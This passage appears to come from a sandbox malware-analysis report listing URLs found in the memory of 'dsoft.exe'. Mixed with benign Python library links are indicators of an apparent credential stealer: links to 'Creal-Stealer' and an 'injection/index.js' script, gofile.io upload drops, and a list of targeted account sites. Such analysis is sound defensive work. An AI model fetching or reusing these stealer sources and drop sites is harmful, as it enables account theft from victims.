Source: dsoft.exe, 00000001.00000003.2537777125.0000029488B98000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538414293.0000029488BA1000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2545860552.0000029488BA5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535580170.0000029489668000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555647774.0000029488BA5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488B98000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548181855.0000029488BA5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488B98000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543261606.0000029488BA5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C13E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: dsoft.exe, 00000001.00000002.2570912516.0000029489FA0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2716548036.000001FA5D5E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: dsoft.exe, 0000000E.00000002.2716548036.000001FA5D5E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920Z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gmail.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gmail.com)z
Source: dsoft.exe, 00000001.00000003.2251226589.0000029489899000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185821263.0000022CEC970000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185629331.0000022CEC9A2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185970287.0000022CEC94A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185749532.0000022CEC989000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2186868206.0000022CEC970000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185715170.0000022CEC96F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185749532.0000022CEC9A2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185925847.0000022CEC9A2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2185629331.0000022CEC989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/Aq7c2m
Source: dsoft.exe, 00000001.00000002.2571489962.000002948A460000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.000002948994A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251126528.000002948994A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/Aq7c2m)
Source: dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2450722331.000001FA5CDA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/DLoibN)
Source: dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE15000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000003.2303495752.00000227F8BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/GyGDwi
Source: dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/GyGDwi)
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549403656.0000029488C79000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2570023169.000002948985B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2571777281.000002948A6C0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547576461.0000029488C72000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2149136211.0000016797652000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2148973225.0000016797639000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2149281559.000001679766B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2149952328.000001679766B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2149281559.0000016797652000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2149136211.0000016797639000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2148973225.0000016797652000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2149136211.000001679766B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2149329817.00000167975F9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2148973225.000001679766B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/IjEJhz
Source: dsoft.exe, 00000001.00000003.2534735683.000002948994D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.000002948994A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251126528.000002948994A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/IjEJhz)
Source: dsoft.exe, 00000001.00000002.2571777281.000002948A670000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/IjEJhz)gg
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549403656.0000029488C79000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.00000294896BB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547576461.0000029488C72000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/qEb3qj
Source: dsoft.exe, 00000001.00000003.2534735683.000002948994D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.0000029489708000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.000002948994A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251126528.000002948994A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/qEb3qj)
Source: dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/u43aVO)
Source: dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546117734.0000029488C7D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541781590.000002948846D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551136597.00000294884B3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539552656.0000029488462000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539842827.0000029488467000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547514499.000002948848E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2553471547.00000294884BB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549283681.0000029488493000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C13E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676516271.000001FA5C17A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C18D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: dsoft.exe, 0000000E.00000003.2686021798.000001FA5C20B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hbo.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hbo.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hotmail.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hotmail.com)z
Source: dsoft.exe, 00000001.00000003.2551343085.0000029489637000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2695994782.000001FA5C34E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: dsoft.exe, 00000001.00000002.2571047548.000002948A180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539909753.0000029488247000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546659014.0000029488D4A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2686089490.000001FA5C2BC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677558955.000001FA5BACC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2685660711.000001FA5BBF2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2695751088.000001FA5BBF5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BAC6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2688317018.000001FA5C368000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: dsoft.exe, 00000001.00000003.2537777125.0000029488C1F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540604780.0000029488C28000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C1F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2544679008.0000029488C37000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C1F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/badge/code%20style-black-000000.svg
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/badge/skeleton-2022-informational
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/codecov/c/github/pypa/setuptools/master.svg?logo=codecov&logoColor=white
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/discord/803025117553754132
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/pypi/pyversions/setuptools.svg
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/pypi/v/setuptools.svg
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/readthedocs/setuptools/latest.svg
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://instagram.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://instagram.com)z
Source: dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488D44000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538502923.0000029488D43000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548120060.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546659014.0000029488D4A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2680203394.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2696286326.000001FA5CD00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://minecraft.net)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://minecraft.net)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://netflix.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://netflix.com)z
Source: dsoft.exe, 00000001.00000003.2541343735.0000029489846000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542760819.000002948984B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2569987100.000002948984C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2602623874.000001FA5CDA3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2450722331.000001FA5CDA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://origin.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://origin.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com)z&
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541596575.0000029488D3F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555063212.0000029488D3F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488D3F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538575246.0000029488D3E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/installing/
Source: dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567821197.0000029488F60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://paypal.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paypal.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://playstation.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://playstation.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pornhub.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pornhub.com)z
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pypi.org/project/setuptools
Source: dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg
Source: dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpgrX
Source: dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpgrXz
Source: dsoft.exe, 00000001.00000002.2570716868.0000029489D80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js
Source: dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Ayhuuu/injection/main/index.jsc
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/pypa/setuptools/main/docs/images/banner-640x320.svg
Source: dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565795035.0000029488720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: dsoft.exe, 0000000E.00000002.2716680852.000001FA5D714000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://riotgames.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riotgames.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://roblox.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://roblox.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sellix.io)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sellix.io)z
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/
Source: dsoft.exe, 00000001.00000003.2009329839.00000294882BD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008823743.0000029488276000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2010187841.00000294882BD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541068000.00000294882BD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008544777.000002948856B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008593991.0000029488514000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008873908.0000029488515000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539381655.00000294882BD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543164414.00000294882EF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2553222285.00000294882F7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677558955.000001FA5BACC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BAC6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2689060049.000001FA5BAEF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2704621267.000001FA5BAFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: dsoft.exe, 00000001.00000002.2568217341.0000029489180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/stable/history.html
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spotify.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spotify.com)z
